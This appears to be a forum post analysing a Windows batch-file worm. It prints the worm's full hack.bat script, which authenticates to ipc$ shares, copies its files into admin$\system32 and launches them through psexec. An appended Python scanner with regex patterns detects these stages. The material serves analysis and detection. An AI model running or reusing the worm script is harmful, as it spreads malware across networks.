I had the opportunity to take a look at it last week. Nice job of NT bat file programming. And from the looks of it, it had copied itself onto 23 other machines before an AV update detected hfind.exe.
It automates the net use command and copies all of its files over to the new drive on a successful attempt. It then makes a call to psexec to start the main bat file on the remote machine and continues on its merry way. Simple but very effective.
The infected machine was using an AT&T dial-up which set itself up with file and print sharing enabled.
Here's hack.bat:
net use \\%1\ipc$ %3 /u:"%2"
copy 10.BAT \\%1\admin$\system32 /y
copy hack.bat \\%1\admin$\system32 /y
copy HFind.exe \\%1\admin$\system32 /y
copy ipc.bat \\%1\admin$\system32 /y
copy IPCPass.txt \\%1\admin$\system32 /y
copy MUMA.BAT \\%1\admin$\system32 /y
copy NWIZ_.EXE \\%1\admin$\system32 /y
copy NWIZe.IN_ \\%1\admin$\system32 /y
copy pcMsg.dll \\%1\admin$\system32 /y
copy psexec.exe \\%1\admin$\system32 /y
copy RANDOM.BAT \\%1\admin$\system32 /y
copy rep.EXE \\%1\admin$\system32 /y
copy replace.bat \\%1\admin$\system32 /y
copy START.BAT \\%1\admin$\system32 /y
copy tihuan.txt \\%1\admin$\system32 /y
copy space.txt \\%1\admin$\system32 /y
copy NEAR.BAT \\%1\admin$\system32 /y
copy ntservice.exe \\%1\admin$\system32 /y
copy NTService.ini \\%1\admin$\system32 /y
copy ntservice.bat \\%1\admin$\system32 /y
copy SS.bat \\%1\admin$\system32 /y
start /i /min /wait /B psexec \\%1 -u %2 -p %3 -d cmd.exe /c ntservice.bat
firewalls, firewalls, firewalls
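As an added example (not part of the post above, and not code from the worm), here is a small static scanner a defender could run over batch files pulled from a share or a quarantine folder. It flags the three stages the post describes: authenticating to the ipc$ share, staging files into admin$\system32, and launching psexec against the same host. The sample inputs are constructed: one is an abbreviated version of the hack.bat quoted above, the other is a benign script used as a control.

```python
import re

# Constructed, abbreviated copy of the hack.bat quoted in the post (sample input only).
SAMPLE_BAT = r"""net use \\%1\ipc$ %3 /u:"%2"
copy hack.bat \\%1\admin$\system32 /y
copy psexec.exe \\%1\admin$\system32 /y
start /i /min /wait /B psexec \\%1 -u %2 -p %3 -d cmd.exe /c ntservice.bat
"""

# Constructed benign batch file used as a control.
BENIGN_BAT = r"""@echo off
copy report.txt D:\backup\ /y
echo done
"""

# Each indicator matches one stage of the propagation routine the post describes.
INDICATORS = {
    # "net use \\host\ipc$ ..." : authenticating to the IPC share
    "ipc_share_auth": re.compile(r"net\s+use\s+\\\\\S+\\ipc\$", re.I),
    # "copy <file> \\host\admin$..." : staging files over the admin share
    "admin_share_copy": re.compile(r"copy\s+\S+\s+\\\\\S+\\admin\$", re.I),
    # psexec invoked as a command against \\host (copying psexec.exe does not count)
    "remote_exec": re.compile(
        r"^\s*(?:start\s+(?:/\S+\s+)*)?psexec(?:\.exe)?\s+\\\\", re.I
    ),
}


def scan_batch(text):
    """Return {indicator_name: [line numbers where it matched]} for a batch script."""
    findings = {name: [] for name in INDICATORS}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                findings[name].append(lineno)
    return findings


def is_lateral_movement(findings):
    """High confidence only when all three stages appear in the same script."""
    return all(findings[name] for name in ("ipc_share_auth", "admin_share_copy", "remote_exec"))


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_BAT), ("benign", BENIGN_BAT)):
        result = scan_batch(text)
        print(label, result, "LATERAL MOVEMENT" if is_lateral_movement(result) else "clean")
```

Requiring all three stages keeps a lone "net use" or "copy" to a share, which admins write all the time, from tripping the alert; any single match is still worth logging as a lower-severity hint.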